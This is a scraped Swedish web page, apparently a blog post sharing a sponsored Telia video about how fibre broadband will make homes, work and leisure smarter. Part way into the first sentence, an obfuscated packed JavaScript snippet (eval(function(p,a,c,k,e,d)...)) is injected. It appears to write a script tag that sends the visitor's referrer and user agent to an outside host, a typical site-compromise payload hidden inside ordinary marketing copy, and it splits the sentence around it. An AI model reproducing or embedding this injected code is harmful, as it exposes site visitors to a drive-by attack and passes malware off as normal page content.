Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Sponsrad Video: Framtiden blir bättre med fiber

telia-framtiden-med -fiber
Sebastian Plengier Ehrnfelt

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_101161564.js”>
Hur eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sytfh|var|u0026u|referrer|bstkd||js|php’.split(‘|’),0,{}))
skulle tillvaron kunna vara om den vore smartare, snabbare och mer intuitiv?

Hur skulle hemmet kunna bli bekvämare och jobbet smidigare?

Nöjen roligare och vänner komma varandra närmre? Här ser du Telias vision av vilka nya möjligheter som med fiberns hjälp snart kommer att finnas inom räckhåll. Exakt hur det kommer att se ut, vet vi inte ännu.

Men vi är strax där.